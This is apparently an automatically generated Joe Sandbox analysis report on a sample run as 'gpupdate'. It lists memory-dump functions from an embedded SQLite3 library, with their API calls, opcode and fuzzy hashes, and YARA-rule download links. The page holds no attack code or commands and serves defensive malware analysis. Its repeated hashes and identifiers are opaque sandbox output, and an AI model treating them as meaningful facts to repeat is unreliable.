                                              • Opcode ID: ccfe54f6f912078cfb2a3792aafdfb18b93a85d821b82c2fca14d14b797d95db
                                              • Instruction ID: 79ae67b732c471d4dd4422a84fb11e7ce9e90e4f386c0ce09fb6ebbfb2a2c528
                                              • Opcode Fuzzy Hash: ccfe54f6f912078cfb2a3792aafdfb18b93a85d821b82c2fca14d14b797d95db
                                              • Instruction Fuzzy Hash: 1F11FCB5908B559BC7009FA9C48555EFBF4BF89718F21CA1EE8A89B350D334D441CF51
                                              Function 61E1065F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 78COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_strglob
                                              • String ID: $
                                              • API String ID: 476814121-227171996
                                              • Opcode ID: 4752aab533c538b27252e9aea6a4a67889569f579198a5855dfef44591980799
                                              • Instruction ID: 0585d3da438e2d59757b373cb063755fbf40413ca71fdf8bbef35b126ffecf87
                                              • Opcode Fuzzy Hash: 4752aab533c538b27252e9aea6a4a67889569f579198a5855dfef44591980799
                                              • Instruction Fuzzy Hash: 6021277090C3829AD7119B79C8C135ABEE4BF86358F38C86DC495CAA88E374D462CB42
                                              Function 61E182EF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_mutex_enter.SQLITE3(?,?,?,?,00000000,?,61E186DB), ref: 61E1831D
                                              • sqlite3_mutex_leave.SQLITE3(?,?,?,?,00000000,?,61E186DB), ref: 61E18374
                                              • sqlite3_mutex_enter.SQLITE3(?,?,?,?,00000000,?,61E186DB), ref: 61E18391
                                              • sqlite3_mutex_leave.SQLITE3(?,?,?,?,00000000,?,61E186DB), ref: 61E183B8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                              • String ID: la
                                              • API String ID: 1477753154-1065728030
                                              • Opcode ID: 2b9b9fc388395d828b25556fb12eea7225132abc46a15d8ac72adc7091fecee2
                                              • Instruction ID: 0ceae6af119b0f18c597fc0688d570363630fede7ba1ca6d546d841e7cedc87a
                                              • Opcode Fuzzy Hash: 2b9b9fc388395d828b25556fb12eea7225132abc46a15d8ac72adc7091fecee2
                                              • Instruction Fuzzy Hash: BA119370A18A138FCB10AFB8C6E5A1937F6FF6A308B28442ED544C7314D731E885CB52
                                              Function 61E28458 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 56COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_create_function.SQLITE3 ref: 61E2849D
                                              • sqlite3_create_function.SQLITE3 ref: 61E284E5
                                              • sqlite3_create_function.SQLITE3 ref: 61E2852D
                                                • Part of subcall function 61E19E3A: sqlite3_mutex_enter.SQLITE3 ref: 61E19E57
                                                • Part of subcall function 61E19E3A: sqlite3_mutex_leave.SQLITE3 ref: 61E19E95
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_create_function$sqlite3_mutex_entersqlite3_mutex_leave
                                              • String ID: rtree$rtree_i32
                                              • API String ID: 1363696727-3944814471
                                              • Opcode ID: 709cb23d2c0fd1b843755a0406f7cd34348661dd86d285e0c7bbe7be480ad146
                                              • Instruction ID: 24632274cfc1a379affe0c7a243e762876e4404ffb9d39506db2f1202928c24d
                                              • Opcode Fuzzy Hash: 709cb23d2c0fd1b843755a0406f7cd34348661dd86d285e0c7bbe7be480ad146
                                              • Instruction Fuzzy Hash: 50214EB05083429BE300DF11C9A671BBBE4BB8075CF20D92CE4D54E395D3BAC5899B82
                                              Function 61E3C3FE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_value_text.SQLITE3 ref: 61E3C41A
                                              • sqlite3_value_text.SQLITE3 ref: 61E3C427
                                              • sqlite3_mprintf.SQLITE3 ref: 61E3C457
                                                • Part of subcall function 61E3A372: sqlite3_initialize.SQLITE3 ref: 61E3A378
                                                • Part of subcall function 61E3A372: sqlite3_vmprintf.SQLITE3 ref: 61E3A392
                                              • sqlite3_result_error.SQLITE3 ref: 61E3C46D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_value_text$sqlite3_initializesqlite3_mprintfsqlite3_result_errorsqlite3_vmprintf
                                              • String ID: after rename
                                              • API String ID: 473106834-392022782
                                              • Opcode ID: b5a2b3c40661c4747d29b80d9ddd08a1384249e019f84855c5bdbbc0265cc66f
                                              • Instruction ID: dd99c20363a9dc688b4be47a1a75d387d7042c77da7420eeef39a7548f91dbd5
                                              • Opcode Fuzzy Hash: b5a2b3c40661c4747d29b80d9ddd08a1384249e019f84855c5bdbbc0265cc66f
                                              • Instruction Fuzzy Hash: A401E9B19087159BC700DF69C48145EFBF5BFC9364F21CA2EE8989B314E735C8418B81
                                              Function 61E2F94E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_initializesqlite3_mutex_entersqlite3_mutex_leavestrcmp
                                              • String ID: @a
                                              • API String ID: 3985776146-2438778631
                                              • Opcode ID: dfa0302e37f5028efc406b98d6a0b2e4f469cc4b8b85b16db2480b43d4ad5787
                                              • Instruction ID: 0a1fc6a068710ead4e7096eaed5024531a953ccd3685b100b453d6cb45c4db2f
                                              • Opcode Fuzzy Hash: dfa0302e37f5028efc406b98d6a0b2e4f469cc4b8b85b16db2480b43d4ad5787
                                              • Instruction Fuzzy Hash: D7F09071B093526BDB006FE988C0B1ABBA8BF8525CF29843CDD888B301D734D81087A2
                                              Function 61E3317A Relevance: 7.7, APIs: 5, Instructions: 219COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_free.SQLITE3 ref: 61E331D2
                                              • sqlite3_malloc64.SQLITE3 ref: 61E33272
                                              • sqlite3_free.SQLITE3 ref: 61E33199
                                                • Part of subcall function 61E0A05C: sqlite3_mutex_enter.SQLITE3 ref: 61E0A07B
                                              • sqlite3_free.SQLITE3 ref: 61E33405
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_free$sqlite3_malloc64sqlite3_mutex_enter
                                              • String ID:
                                              • API String ID: 3222813361-0
                                              • Opcode ID: 22acc2d4dc84de10b81a05e3edfae47a0ce2502db87effb11c3738a0025b3a4d
                                              • Instruction ID: 378818b1940cca78d9c0d4a602067ecc41e6ebe07827c8ea45dc256ad928f491
                                              • Opcode Fuzzy Hash: 22acc2d4dc84de10b81a05e3edfae47a0ce2502db87effb11c3738a0025b3a4d
                                              • Instruction Fuzzy Hash: A6A1BE75E05269CFDB00CFE9C480A9DBBF1BF88314F25852AE859AB344E774A945CF81
                                              Function 61E04EE1 Relevance: 7.7, APIs: 5, Instructions: 190COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_strnicmp
                                              • String ID:
                                              • API String ID: 1961171630-0
                                              • Opcode ID: 4cb59792ca1bc15da7a01f4f32e0a1b34ea26c38b2ff50afe80d46d876931a95
                                              • Instruction ID: 3022473e2edca1aa7eecd10e87543fb7a10b18b6393c15370b82bbe0f1428ce1
                                              • Opcode Fuzzy Hash: 4cb59792ca1bc15da7a01f4f32e0a1b34ea26c38b2ff50afe80d46d876931a95
                                              • Instruction Fuzzy Hash: 6D51D56544964199EB104E9485893AABFE79F5330FF78E81BC4A04B351C23BC0FB8B83
                                              Function 61E4C294 Relevance: 7.6, APIs: 5, Instructions: 146COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,61E4C51F), ref: 61E4C2BD
                                              • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,61E4C51F), ref: 61E4C42A
                                              • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,61E4C51F), ref: 61E4C43C
                                              • sqlite3_free.SQLITE3 ref: 61E4C453
                                              • sqlite3_free.SQLITE3 ref: 61E4C45B
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_freesqlite3_mutex_leave$sqlite3_mutex_free
                                              • String ID:
                                              • API String ID: 2921195555-0
                                              • Opcode ID: a39f5be180b446b09f53e8e34523c036fd1effc0b71de8b642cfdbb5b9ec0787
                                              • Instruction ID: e5e6b54d3fe5a156a9fba0792a898b09428bc8806d4786df66fad9102b90835e
                                              • Opcode Fuzzy Hash: a39f5be180b446b09f53e8e34523c036fd1effc0b71de8b642cfdbb5b9ec0787
                                              • Instruction Fuzzy Hash: E9518971B006468BDB00EFA9D880649B7B1BF88318F25C5BDDC589F315DB34E85ACBA0
                                              Function 61E368DF Relevance: 7.6, APIs: 5, Instructions: 108COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_result_null.SQLITE3 ref: 61E36904
                                              • sqlite3_result_int.SQLITE3 ref: 61E36926
                                              • sqlite3_result_int64.SQLITE3 ref: 61E369E8
                                              • sqlite3_result_double.SQLITE3 ref: 61E36A1C
                                              • sqlite3_malloc.SQLITE3 ref: 61E36A51
                                              • sqlite3_result_text.SQLITE3 ref: 61E36ACE
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_mallocsqlite3_result_doublesqlite3_result_intsqlite3_result_int64sqlite3_result_nullsqlite3_result_text
                                              • String ID:
                                              • API String ID: 402655203-0
                                              • Opcode ID: 148538cbeec08b841b003cc479dadf8a001560148fd2d239e8034718a2a0f9b1
                                              • Instruction ID: 0bb3529644d8f60e189bddab43bf8eb32c0fd03cfb56941951e9fc7e9fa2d7c8
                                              • Opcode Fuzzy Hash: 148538cbeec08b841b003cc479dadf8a001560148fd2d239e8034718a2a0f9b1
                                              • Instruction Fuzzy Hash: 53416D71D082A98ACB009FBCD49469DBBF1AFCD314F29C86ED894AB345D334C981CB52
                                              Function 61E4C182 Relevance: 7.6, APIs: 5, Instructions: 100COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 61E17A8A: sqlite3_mutex_try.SQLITE3(?,?,?,61E17B0A), ref: 61E17A2A
                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E4C1E6
                                              • sqlite3_mutex_free.SQLITE3 ref: 61E4C227
                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E4C237
                                              • sqlite3_free.SQLITE3 ref: 61E4C266
                                              • sqlite3_free.SQLITE3 ref: 61E4C285
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_free$sqlite3_mutex_entersqlite3_mutex_freesqlite3_mutex_leavesqlite3_mutex_try
                                              • String ID:
                                              • API String ID: 1894464702-0
                                              • Opcode ID: f29158a0b46bb1f7a6b7ea68bc968db02d411955273c6c496946e0ab5e83bd09
                                              • Instruction ID: b74e33ba8b94a852a9a1b61bac9be73305890ec4dc98135764a92d484c317645
                                              • Opcode Fuzzy Hash: f29158a0b46bb1f7a6b7ea68bc968db02d411955273c6c496946e0ab5e83bd09
                                              • Instruction Fuzzy Hash: 4B315C74B04A428BE704DFF9E4C0A1A77F2BFD4748B38C469D8489B315E771E8868B85
                                              Function 61E3D5F2 Relevance: 7.6, APIs: 5, Instructions: 92COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_value_int.SQLITE3 ref: 61E3D624
                                              • sqlite3_mprintf.SQLITE3 ref: 61E3D6C0
                                                • Part of subcall function 61E3A372: sqlite3_initialize.SQLITE3 ref: 61E3A378
                                                • Part of subcall function 61E3A372: sqlite3_vmprintf.SQLITE3 ref: 61E3A392
                                              • sqlite3_result_error_nomem.SQLITE3 ref: 61E3D6CE
                                              • sqlite3_free.SQLITE3 ref: 61E3D6F0
                                              • sqlite3_result_double.SQLITE3 ref: 61E3D707
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_freesqlite3_initializesqlite3_mprintfsqlite3_result_doublesqlite3_result_error_nomemsqlite3_value_intsqlite3_vmprintf
                                              • String ID:
                                              • API String ID: 1587739625-0
                                              • Opcode ID: 38c3d37dbbc9ef808dd14407f42fcde51bae806baf74d811f9affba58be063cd
                                              • Instruction ID: 1337f0edae3fd5d813b3804a32c7d3a28bfbc18fce06c3f33d064c4213d3c9c4
                                              • Opcode Fuzzy Hash: 38c3d37dbbc9ef808dd14407f42fcde51bae806baf74d811f9affba58be063cd
                                              • Instruction Fuzzy Hash: 173157B8A08B6ADBCB017F85C58028EBBB0FFC9304F61C459D89957354E735C8A1CB86
                                              Function 61E22CD3 Relevance: 7.6, APIs: 5, Instructions: 91COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_log.SQLITE3 ref: 61E22D01
                                              • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,61E22E15), ref: 61E22D15
                                              • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,61E22E15), ref: 61E22D3D
                                              • sqlite3_log.SQLITE3 ref: 61E22D5B
                                              • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,61E22E15), ref: 61E22D91
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_logsqlite3_mutex_leave$sqlite3_mutex_enter
                                              • String ID:
                                              • API String ID: 1015584638-0
                                              • Opcode ID: be6d35e49e8b59ffcc3b9401bc123075ea3dd04db447ef8d1f4b4255b3b31de9
                                              • Instruction ID: 1ab067f5e2cff68190ebc81ab1d5e08782165a21530ac94b12e047ab1d3cfa77
                                              • Opcode Fuzzy Hash: be6d35e49e8b59ffcc3b9401bc123075ea3dd04db447ef8d1f4b4255b3b31de9
                                              • Instruction Fuzzy Hash: DD31E035214A468BDB00AF78C4A07467BE1EFC5318F39C5A9EC548F3AAD739D842CB52
                                              Function 61E1E87F Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_str_appendf.SQLITE3 ref: 61E1E8DF
                                              • sqlite3_str_append.SQLITE3 ref: 61E1E912
                                              • sqlite3_str_appendall.SQLITE3 ref: 61E1E92C
                                              • sqlite3_str_append.SQLITE3 ref: 61E1E944
                                              • sqlite3_str_appendall.SQLITE3 ref: 61E1E950
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_str_appendsqlite3_str_appendall$sqlite3_str_appendf
                                              • String ID:
                                              • API String ID: 3231710329-0
                                              • Opcode ID: ae633aa921cfc0f06af821fb5b1aeb292f95a07ec8ba06cc714754d8582b1254
                                              • Instruction ID: d0aa79bd44f6bc4dc4a8c6e0436a5d5844cbb88da5d6fe052b7e3cd60d5a91bf
                                              • Opcode Fuzzy Hash: ae633aa921cfc0f06af821fb5b1aeb292f95a07ec8ba06cc714754d8582b1254
                                              • Instruction Fuzzy Hash: 7631F6B19087499BCB10DF99C48578EFBF1BF84718F24892EE488AB354D735A841CB41
                                              Function 61E4BFDC Relevance: 7.6, APIs: 5, Instructions: 76COMMON
                                              Download Yara Rule
                                              APIs
